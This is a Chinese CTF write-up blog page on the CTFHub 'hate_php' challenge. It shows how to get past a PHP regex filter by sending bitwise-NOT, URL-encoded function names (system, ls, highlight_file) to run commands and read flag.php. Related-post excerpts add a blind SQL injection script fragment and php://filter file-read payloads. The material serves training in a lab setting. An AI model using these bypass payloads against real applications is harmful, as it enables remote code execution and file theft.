【CTFHub】hate_php 2020 函数绕过

最新推荐文章于 2024-11-17 21:18:16 发布
最新推荐文章于 2024-11-17 21:18:16 发布
阅读量888 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/manerzi/article/details/127659701
本文介绍了一种通过PHP脚本利用特殊编码方式绕过过滤器进行目录扫描的方法。具体展示了如何使用异或函数绕过常见的过滤字符,并通过实例演示了如何执行ls命令来扫描目标文件夹。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述我们可以看出这里过滤了f、l、a、g、/、;、"、'、’、`、||、[、]、_等等
我们可以使用异或函数进行绕过

<?php
echo urlencode(~"system");
echo "\n;
echo urlencode(~"ls");

在这里插入图片描述在这里插入图片描述
我们将这一串字符输入到地址栏中,进行扫描目录操作
在这里插入图片描述在这里插入图片描述

接下来我们打开flag.php文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功~
在这里插入图片描述

2020第五空间 hate-php rosb 交流
Rashu99's blog
06-27 2407
hate-php 取反绕过对字母和数字的过滤 php在线运行 <?php echo urlencode(~'highlight_file'); //%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A echo "\n"; echo urlencode(~'flag.php'); //%99%93%9E%98%D1%8F%97%8F ?> /?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%9
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 2304
三星难度Web题 afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
CTFhub】——hate_php2021
manerzi的博客
11-02 1432
CTFhub】——hate_php2021
CTFHUB web-hate_php
m0_57954651的博客
09-05 1701
打开题目 一篇代码 先进行代码审计 看到PHP正则表达式 preg_match 显然在传参时 它会进行过滤 过滤后面括号中的关键字和特殊符号 第二个正则表达式也会过滤PHP的内置函数 即使我们找到了某个函数恰好可以绕过第一个 但也过不去第二个过滤 函数 get_defined_functions 所以这里我们利用异或或者取反来绕过 一般flag文件都会存放在根目录下 但是这里我们知道在哪 所以尝试一下 使用print_r函数 进行目录扫描 利用在线
ctfhub hate_php
m0_57954651的博客
11-15 472
闭合前面的php 同时执行我们后面构造想要执行的内容。首先进行了一个正则匹配 过滤掉了A~Z的26个字母大写 a ~ z的26个字母小写 0 ~9这十个数字。preg_match函数。我们需要构造语句绕过
CTFHub-hate_php
最新发布
九尾ww的博客
11-17 378
用取反操作,发现环境限制,也不行。利用通配符来匹配文件路径。不能用定义变量的做法。
CTFHUB历年真题练习
qq_51558360的博客
10-11 1626
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
Web刷题日记1---清风
weixin_71913298的博客
10-25 1122
然后运行alert(_0x324fcb(0x2d9,0x2c3,0x2db,0x2f3)+'k3r_h0pe_t'+_0xe4a674(0x5a1,0x595,0x59e,0x57c)+'irlfriend}'),!0x00是⼗六进制表示⽅法,是在ascii码中为0的字符,有些函数会将0x00当做结束符,从⽽进⾏⽂件上传的绕过。从源代码中寻找flag,虽然没有找到,但是看见了2028.js文件,发现类似flag的js放控制台运行。进入靶场,比较突兀,点了这个button后,提示flag在附近。
第五空间 hate_php
weixin_53955759的博客
09-30 1754
打开环境源码如下 正则匹配过滤了flag . p h / ; " ' ` | [ ] _ 绕过正则匹配的方法可以用两次取反urlencode编码来绕过它 看了wp,在php7以后可以用($a)();来执行函数 它会先执行($a)里面的函数,之后在执行();里的函数 那么就用highlight_file来返回flag.php的内容 ...
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php
weixin_40872714的博客
03-29 2667
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php 打开网址直接告诉你过滤的代码,把字母数字和$、_、@都过滤了,直接放弃 然后百度搜了这道题的答案,感觉发现了新大陆一样,下面是相关的几篇文章,强烈推荐阅读: 过滤了大写字母和数字的绕过方法: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 过滤了大小写字母、数字、‘$’和‘_’ https://www.leavesongs.co
Build APIs You Won't Hate
01-03
Build APIs You Won't Hate,教你如何构建优美的API,让你的API简单易懂!
-Web-hate_php
2301_80113257的博客
06-29 249
代码审计后,发现对输入code进行了正则表达式匹配,过滤了英文大小写字母、数字和_$@三个特殊字符。本题的关键就是绕过正则匹配,执行eval()函数。读取到源码发现存在如下函数(我没找到?最后直接读取flag文件。
[RoarCTF 2019]Easy Calc
weixin_42346836的博客
10-16 476
查看源码发现有一个页面,直接访问 源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklis
【第五空间智能安全大赛】web hate-php
weixin_45844670的博客
09-13 858
进入题目链接 得到源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
CTF中Web题目的各种基础的思路-----入门篇十分的详细
热门推荐
m0_64815693的博客
09-13 4万+
想学习CTF-web这里给你一个思路,给你一个方向
CTFHUB Web题解记录(信息泄露、弱口令部分)
豆傻小饼干随记
03-18 7782
以下内容只是自己做题的一个记录,不喜勿喷 一、信息泄露 1、目录遍历 这里通过观察目录的情况,发现目录都是 /flag_in_here/1/%d 的样式,于是构造脚本 #!/usr/bin/python3 # -*- coding: utf-8 -*- # --author:valecalida-- import urllib.request import urllib.re...
CTFhub php://input
qq_41497476的博客
07-27 4038
这一次相对于远程包含过滤了php://就不能直接利用 input 伪协议完成命令执行了 <?php if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) { include($_GET["file"]); } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?&g
2021津门杯web部分复现
1ance's blog
05-17 1082
Web 1、power_out 通过分析(停电)可以知道可能是有备份文件或者编辑器异常退出时保存的记录。 扫描目录或者查看常见的目录 vim编辑器备份文件 .index.php.swp(找到文件下载) .index.php.swo .index.php.swn 发现乱码 b0VIM 7.4  o慲? 4  root 7fa16b649c4b /var/www/ht
津门WP
qq_51425032的博客
05-12 611
津门杯WP 前言:由于津门和红帽俩比赛撞在一起,就顺便和队友一起打了,但后面专门去红帽了,自己还是好菜,前面的都全A了 web1 power_cut 打开后显示:昨天晚上因为14级大风停电了. 猜测跟意外关闭后生成的备份文件相关,访问http://119.3.128.126:32800/.index.php.swp 获得文件,vim -r恢复得到源码: <?php class logger{ public $logFile; ​ public $initMsg; ​ public $
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值